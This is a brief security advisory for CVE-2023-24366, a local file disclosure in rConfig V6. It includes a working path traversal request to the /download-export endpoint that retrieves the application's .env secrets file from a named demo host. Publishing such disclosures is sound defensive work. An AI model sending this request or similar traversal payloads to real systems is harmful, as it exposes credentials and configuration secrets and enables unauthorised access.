rConfig V6 Local File Disclosure CVE-2023-24366
An authenticated user may download anyfile on system using the endpoint "/download-export". To download the .env file simply send this request :
http://v6demo.rconfig.com/download-export?filename=../../../../.env&type=export
